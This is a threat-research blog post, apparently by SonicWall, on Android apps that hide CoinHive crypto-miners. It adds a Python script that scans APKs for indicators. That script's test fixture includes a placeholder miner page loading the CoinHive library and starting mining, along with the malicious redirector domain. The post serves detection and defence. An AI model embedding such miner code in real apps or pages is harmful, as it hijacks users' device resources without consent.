Sudden surge in Android miner malware observed
The SonicWall Threats Research team observed a sudden spike in Android apps with hidden crypto-miner functionality. Such apps masquerade as legitimate apps, such as games, music or video players, but in the background they mine cryptocurrency using the hardware resources of the infected victim's device.
Malicious Android apps with mining capability have existed for some time, but we saw a sudden surge in such apps on January 8, 2018. With the recent popularity of cryptocurrencies like Bitcoin, Ethereum and Ripple, the rise in such malware is not surprising.
The only permission requested by the app is the ability to access the Internet. This is an extremely common permission that is used by most Android apps, so on the basis of permissions alone it is difficult to flag this app as malicious; the mining code itself has to be examined.
The cryptocurrency mining script resides in the Assets folder as engine.html. This script contains the functions to start and stop the mining:
The app starts a service - CoinHiveIntentService - which monitors, starts and stops the crypto-mining on the infected device.
One of the links displayed by the app after startup is a redirector that leads to the installation of more malicious apps:
As shown above, this site is already being flagged as malicious.
We observed a sharp rise in miner samples on January 8, 2018. The following are common among these samples:
- The code structure
- Certificate thumbprint/serial number
- Miner service - CoinHiveIntentService
- Hardcoded domain - hxxp://lp.androidapk.world/?appid=
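Since the requested permissions give nothing away, triage of these samples has to look inside the APK for the indicators listed above. The following script is an added example written for this post, not SonicWall's own tooling: it treats the APK as the zip archive it is and checks for an HTML miner script under assets/, the CoinHiveIntentService class name in the DEX, and the hardcoded redirector domain. The sample APK is constructed in memory so the script runs offline; the JavaScript inside its engine.html and the class path in its classes.dex are placeholders modelled on the description, not bytes from a real sample.

```python
"""Triage an APK for the CoinHive-miner indicators described in the post.

Added example, not SonicWall's tooling. Indicators (miner HTML in assets/,
the CoinHiveIntentService class name, the lp.androidapk.world domain) come
from the write-up; the regexes and the scoring rule are this script's own.
"""
import io
import re
import zipfile

# Indicators from the write-up; the patterns themselves are assumptions.
HTML_ASSET_RE = re.compile(r"^assets/.*\.html?$", re.I)
MINER_SCRIPT_RE = re.compile(rb"coinhive", re.I)
SERVICE_NAME = b"CoinHiveIntentService"
REDIRECT_DOMAIN = b"lp.androidapk.world"
MAX_ENTRY_BYTES = 16 * 1024 * 1024  # skip huge media files, they are not code


def scan_apk(apk_bytes: bytes) -> dict:
    """Return indicator name -> list of zip entries in which it was found."""
    hits = {"miner_html": [], "miner_service": [], "redirect_domain": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for info in zf.infolist():
            if info.file_size > MAX_ENTRY_BYTES:
                continue
            data = zf.read(info.filename)
            # A browser-miner script shipped as an HTML asset.
            if HTML_ASSET_RE.match(info.filename) and MINER_SCRIPT_RE.search(data):
                hits["miner_html"].append(info.filename)
            # Class names and string constants live in classes*.dex as plain bytes.
            if SERVICE_NAME in data:
                hits["miner_service"].append(info.filename)
            if REDIRECT_DOMAIN in data:
                hits["redirect_domain"].append(info.filename)
    return hits


def verdict(hits: dict) -> str:
    """Scoring rule (an assumption): the service name alone is strong enough,
    otherwise require two distinct indicators before flagging."""
    n = sum(1 for entries in hits.values() if entries)
    if hits["miner_service"] or n >= 2:
        return "suspected-coinhive-miner"
    if n == 1:
        return "review"
    return "clean"


def build_sample_apk(malicious: bool = True) -> bytes:
    """Constructed lookalike of the described apps (not a real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<binary-axml placeholder>")
        zf.writestr("res/drawable/icon.png", b"\x89PNG placeholder")
        if malicious:
            # Placeholder miner page with start/stop functions, as the post describes.
            zf.writestr(
                "assets/engine.html",
                "<script src='https://coinhive.com/lib/coinhive.min.js'></script>"
                "<script>var miner = new CoinHive.Anonymous('SITE_KEY');"
                "function startMining(){ miner.start(); }"
                "function stopMining(){ miner.stop(); }</script>",
            )
            # Placeholder DEX: class descriptor and hardcoded URL as raw strings.
            zf.writestr(
                "classes.dex",
                b"dex\n035\x00...Lcom/example/app/CoinHiveIntentService;..."
                b"http://lp.androidapk.world/?appid=...",
            )
        else:
            zf.writestr("assets/help.html", "<p>About this game</p>")
            zf.writestr("classes.dex", b"dex\n035\x00...Lcom/example/app/MainActivity;")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_apk()
    found = scan_apk(data)
    print(verdict(found), found)
```

Run it with a path to an APK to scan a real file, or with no arguments to scan the constructed sample. Because the check is on raw bytes rather than a parsed DEX, it also catches the strings when they sit in a secondary classes2.dex or in an embedded library; the price is that a sample which builds the class name or domain at runtime will not match, so treat a "clean" verdict as "no known indicator", not as a clean bill of health.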
Sonicwall Capture Labs provides protection against this threat with the following signatures:
- GAV: AndroidOS.MoneroMiner.MNR (Trojan)
- GAV: AndroidOS.CoinHack.MNR (Trojan)
A few of the Android samples we observed as part of the surge:
Once the miner app starts, CPU usage on the device climbs to almost 100% utilization. Unlike another mining app we covered earlier, however, this app did not noticeably heat up the phone.